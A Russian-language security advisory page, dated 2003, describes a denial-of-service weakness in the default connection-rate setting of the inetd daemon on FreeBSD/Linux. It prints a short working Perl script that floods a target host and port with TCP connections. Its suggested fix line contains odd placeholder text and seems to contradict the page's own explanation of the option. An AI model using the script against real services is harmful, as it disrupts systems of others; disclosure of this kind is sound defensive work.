Слабая конфигурация по умолчанию для InetD демона в большинстве FreeBSD/linux инсталляций

Дата публикации:
07.09.2003
Дата изменения:
17.10.2006
Всего просмотров:
1177
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:

Уязвимые версии: InetD (Internet Services Daemon)

Описание: Уязвимость обнаружена в Internet Services Daemon. В конфигурации по умолчанию на большинстве FreeBSD/linux инсталляций, удаленный пользователь может завесить работу службы, используя уязвимость, обнаруженную более 11 лет назад.

InetD использует опцию:

-R rate
Которая определяет максимальное число подключений с одного хоста в течение минуты. Значение по умолчанию – 256. Значение 0 означает, что число подключений неограниченно.

Атакующий, способный установить более 256 подключений в течение минуты (зависит от его пропускной способности), может нарушить работу службы в течение следующих 10 минут. Если атакующий завершит подключение перед восстановлением работы службы, то его нападение не будет зарегистрировано.

Пример/Эксплоит:

#!/usr/bin/perl

use Socket;
$host=@ARGV[0];
$port=@ARGV[1];
if ($host eq "" || $port eq "") {print "\n Usage progname HOST PORT \n";} 
$iadr=inet_aton($host); $padr=sockaddr_in($port,$iadr); for($i=0; $i < 
300; $i++) { socket(SOCK,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
 connect(SOCK,$padr) or next;
 close(SOCK);
}
print "\nDone\n";

Решение:

Добавте следующую строку в inetd.conf файл:
-R 0 -s your_ad_can_be_here


Ссылки: 11 years of inetd default insecurity?
или введите имя

CAPTCHA